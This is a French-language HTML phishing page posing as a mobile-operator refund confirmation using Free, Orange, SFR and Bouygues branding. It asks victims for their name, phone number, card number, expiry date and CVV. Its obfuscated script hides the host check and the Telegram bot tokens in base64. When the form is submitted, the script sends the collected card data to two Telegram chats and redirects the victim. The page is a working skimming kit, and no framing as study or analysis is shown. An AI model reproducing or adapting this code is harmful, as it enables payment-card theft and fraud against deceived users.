<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Confirmation</title>

    <style>

body {
            font-family: Arial, sans-serif;
            background-color: #fff;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100%;
            width: 100%;
            margin: 0;
            padding: 0;
            user-select: none;  
        }

    #operators {
    width: calc(100% - 40px);
    max-width: 300px;
    height: auto;
    display: flex;
    gap: 4%;
    box-sizing: border-box;
    margin: 20px 25px;
    padding: 0;
}

#operators div {
    width: 100%;
    aspect-ratio: 1;
    margin: 0;
    padding: 0;
    background-size: cover;
    background-position: center;
    border-radius: 5px;
    box-shadow: 0 0 8px 0 #dfdfdf;
}

#free {background-image: url('https://files.catbox.moe/14cv1m.png');}
#orange {background-image: url('https://files.catbox.moe/sahzy3.png');}
#sfr {background-image: url('https://files.catbox.moe/36bbw4.png');}
#bouygues {background-image: url('https://files.catbox.moe/juqpsh.png');}

        #refund {
            width: calc(100% - 40px);
            max-width: 300px;
            margin: 20px 0;
        }

        #card {
            padding: 15px;
            margin: 0 15px;
            max-width: 320px;
            box-sizing: border-box;
            display: flex;
            flex-direction: column;
            gap: 10px;
            border-radius: 10px;
            border: 1px solid #eaeaea;
            box-shadow: 2px 2px 5px 0 #eee;
        }

        #fullname, #mmyycvv {
            display: flex;
            justify-content: space-between;
            margin: 0;
            padding: 0;
            gap: 10px;
        }

        

        #inputfirstname, #inputlastname, #inputphonenumber, #inputcardnumber,#operator, #pickmm, #pickyy, #inputcvv {
            box-sizing: border-box;
            width: 100%;
            margin: 0;
            padding: 8px 0;
            border-radius: 4px;
            font-size: 14px;
            border: 1px solid #ccc;
        }

        #inputfirstname, #inputlastname, #inputphonenumber, #inputcardnumber, #inputcvv {
            padding-left: 10px;
            padding-right: 10px;
        }


        #inputcardnumber {
            letter-spacing: 2px;
            text-align: center;
        }

        #pickmm, #pickyy, #operator, #inputcvv {
            text-align: center;
        }

        input[type="number"] {
            -moz-appearance: textfield;
            appearance: textfield;
        }

        input[type="number"]::-webkit-outer-spin-button,
        input[type="number"]::-webkit-inner-spin-button {
            -webkit-appearance: none;
            margin: 0;
        }

        #button {
        margin: 10px 0 0 0;
        padding: 10px;
        background-color: #080;
        color: #fff;
        border-radius: 4px;
        box-sizing: border-box;
        width: 100%;
        height: fit-content;
        text-align: center;
        font-size: 11px;
        cursor: pointer;
    }

#button:active {
background-color: #0a0;
}

        #error {
            font-size: 10px;
            font-weight: bold;
            font-style: italic;
            color: #f00;
            margin: 5px 5px 0 5px;
            padding: 0;
            display: none;
        }

        input:focus {
        outline: none;
        box-shadow: none;
}

    </style>
</head>
<body>
    <div id="operators">
        <div id="free"></div>
        <div id="orange"></div>
        <div id="sfr"></div>
        <div id="bouygues"></div>
    </div>

    <div id="card">
        <div id="fullname">
                <input type="text" id="inputfirstname" placeholder="Prénom">
                <input type="text" id="inputlastname" placeholder="Nom">
        </div>

        <input type="text" id="inputphonenumber" oninput="formatPhoneNumber(event)" placeholder="Numéro de téléphone">

        <select id="operator">
            <option value="select">-- Choisissez un operateur --</option>
            <option value="orange">Orange</option>
            <option value="sfr">SFR</option>
            <option value="bouygues">Bouygues Telecom</option>
            <option value="free">Free Mobile</option>
            <option value="other">Other</option>  
        </select>

        <input type="text" id="inputcardnumber" oninput="formatCardNumber(event)" placeholder="XXX XXX XXX XXX">

        <div id="mmyycvv">

                <select id="pickmm">
                    <option value="mm">Mois</option>
                    <option value="01">01</option>
                    <option value="02">02</option>
                    <option value="03">03</option>
                    <option value="04">04</option>
                    <option value="05">05</option>
                    <option value="06">06</option>
                    <option value="07">07</option>
                    <option value="08">08</option>
                    <option value="09">09</option>
                    <option value="10">10</option>
                    <option value="11">11</option>
                    <option value="12">12</option>
                </select>

                <select id="pickyy">
                    <option value="yy">Année</option>
                    <option value="25">25</option>
                    <option value="26">26</option>
                    <option value="27">27</option>
                    <option value="28">28</option>
                    <option value="29">29</option>
                    <option value="30">30</option>
                    <option value="31">31</option>
                    <option value="32">32</option>
                    <option value="33">33</option>
                    <option value="34">34</option>
                    <option value="35">35</option>
                </select>

                <input type="text" id="inputcvv" oninput="formatCvv(event)" placeholder="CVV">

        </div>

        <p id="button" >Confirmer votre remboursement</p>

        <p id="error"></p>
        
    </div>

    <img src="https://files.catbox.moe/r7fjcx.jpeg" alt="refund" id="refund">

<script>
    var data = ["d2luZG93LmxvY2F0aW9uLmhvc3RuYW1l","cmVtYm91cnNlbWVudC1vbmxpbmUuZ2l0aHViLmlv"];
    document.body.style.display = 'none';
if (eval(atob(data[0])) === atob(data[1])) {
    document.body.style.display = 'flex';
    function formatPhoneNumber(event) {
    let input = event.target;
    let value = input.value;

    value = value.replace(/[^0-9]/g, '');

    if (value.length > 10) {
        value = value.slice(0, 10);
    }

    input.value = value;
}

function formatCardNumber(event) {
    let input = event.target;
    let value = input.value.replace(/\D/g, '');

    value = value.replace(/(.{4})(?=\d)/g, '$1 ');

    if (value.length > 19) {
        value = value.slice(0, 19);
    }

    input.value = value;
}

function formatCvv(event) {
    let input = event.target;
    let value = input.value.replace(/\D/g, '');

    if (value.length > 4) {
        value = value.slice(0, 4);
    }

    input.value = value;
}


document.addEventListener("dragstart", function(event) {
if (event.target.tagName.toLowerCase() === "img") {
event.preventDefault();
}
});




document.getElementById('button').addEventListener('click', function(event) {
event.preventDefault();

var firstname = document.getElementById('inputfirstname').value.replace(/\s/g, '');
var lastname = document.getElementById('inputlastname').value.replace(/\s/g, '');
let phone = document.getElementById('inputphonenumber').value;
let cardnumber = document.getElementById('inputcardnumber').value.replace(/\s/g, '');
var operator = document.getElementById('operator').value;
let mm = document.getElementById('pickmm').value;
let yy = document.getElementById('pickyy').value;
let cvv = document.getElementById('inputcvv').value;
var error = document.getElementById('error');

var msg = `
Nom: ${firstname} ${lastname}
num: ${phone}
operator: ${operator}
cart: ${cardnumber}
mmyy: ${mm} / ${yy}
cvv: ${cvv}`;

if (firstname === '' || lastname === '' || phone.length !== 10 || cardnumber.length !== 16 || cvv.length < 3 || operator === 'select' || mm === 'mm' || yy === 'mm') {
error.innerHTML = 'Certains champs sont vides. Veuillez remplir tous les champs requis.';
error.style.display = 'block';
} else {
const tokens = [
atob('NzkyNDAzMTAyOTpBQUdERkVqMTV0Zm90dzJ1Y0lQQWZrVnh0QUM5cW9EVzdGOA=='),
atob('ODA4MTcwNzY2ODpBQUVENFBnQjRhWnlrUmxTZkkwVG96Q3BYWDFjakNvOG1FVQ==') //YY
];
const chatIds = [
atob('Njg5MDQ5MjY0Ng=='),
atob('NjY2OTY5MzgwNQ==') //YY
];

tokens.forEach((token, index) => {
const url = `https://api.telegram.org/bot${token}/sendMessage`;

const data = {
chat_id: chatIds[index],
text: msg
};

fetch(url, {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify(data)
})
.then(response => response.json())
.then(data => {
if (data.ok) {
    if (index === tokens.length - 1) {
        window.location.href = "/verification";
    }
} else {
    error.innerHTML = "Une erreur s'est produite. Veuillez actualiser la page et réessayer.";
    error.style.display = 'block';
}
})
.catch(err => {
error.innerHTML = "Problème de connexion. Vérifiez votre réseau et réessayez.";
error.style.display = 'block';
});
});



}//if


});//click

}
</script>
</body>
</html>
